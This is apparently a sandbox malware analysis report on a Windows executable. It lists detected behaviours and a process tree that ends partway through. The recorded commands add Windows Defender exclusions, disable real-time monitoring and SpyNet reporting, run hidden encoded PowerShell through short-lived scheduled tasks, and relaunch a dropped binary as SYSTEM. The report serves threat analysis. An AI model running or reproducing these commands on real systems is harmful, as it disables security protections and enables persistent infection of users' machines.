Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    149s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 21:40

General

  • Target

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe

  • Size

    6.3MB

  • MD5

    ded964e022a37d93d434091ec75f9881

  • SHA1

    e89a551ac1f19dc3838e21157667e2f98d84d06b

  • SHA256

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

  • SHA512

    13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

  • SSDEEP

    196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Users\Admin\AppData\Local\Temp\7zS9B46.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3044
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2296
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2900
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            5⤵
              PID:2828
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          3⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2808
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2932
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2228
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gBaUAFyGj" /SC once /ST 17:51:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2824
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gBaUAFyGj"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2364
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gBaUAFyGj"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2128
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe\" q8 /site_id 525403 /S" /V1 /F
          3⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2640
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {41965AA1-83FD-4B86-B789-F93F26497EC6} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
      1⤵
        PID:1892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2752
          • C:\Windows\system32\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force
            3⤵
              PID:1472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:676
            • C:\Windows\system32\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              3⤵
                PID:2440
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2528
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:1728
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1600
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2912
              • C:\Windows\system32\gpscript.exe
                gpscript.exe /RefreshSystemParam
                1⤵
                  PID:2316
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {70247DA3-6C39-4EBC-855B-0EFB3E8019D6} S-1-5-18:NT AUTHORITY\System:Service:
                  1⤵
                    PID:2320
                    • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe
                      C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe q8 /site_id 525403 /S
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      PID:1984
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "gejFPWVdX" /SC once /ST 10:36:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1884
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /run /I /tn "gejFPWVdX"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1840
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /DELETE /F /TN "gejFPWVdX"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1656
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                        3⤵
                          PID:1064
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1304
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2124
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            • System Location Discovery: System Language Discovery
                            PID:2992
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gkCmkKzew" /SC once /ST 12:14:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1468
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gkCmkKzew"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1932
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /DELETE /F /TN "gkCmkKzew"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2880
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                          3⤵
                            PID:2252
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              4⤵
                              • Windows security bypass
                              • System Location Discovery: System Language Discovery
                              PID:3048
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                            3⤵
                              PID:2800
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                4⤵
                                • Windows security bypass
                                • System Location Discovery: System Language Discovery
                                PID:2840
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              3⤵
                                PID:2824
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:804
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2364
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1276
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2376
                              • C:\Windows\SysWOW64\wscript.exe
                                wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
                                3⤵
                                • Modifies data under HKEY_USERS
                                PID:320
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2752
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:2280
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2580
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:1596
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2560
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2416
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  PID:2056
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:1168
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2640
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:940
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2088
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:1000
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  PID:1076
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:2132
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2592
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2204
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                    PID:1724
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2308
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:956
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2820
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                      PID:2568
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2324
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1524
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2676
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:868
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2052
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2440
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2180
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1568
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1304
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                        PID:2060
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2744
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gKnvhIPVZ" /SC once /ST 14:30:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1836
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gKnvhIPVZ"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2272
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gKnvhIPVZ"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2880
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                      3⤵
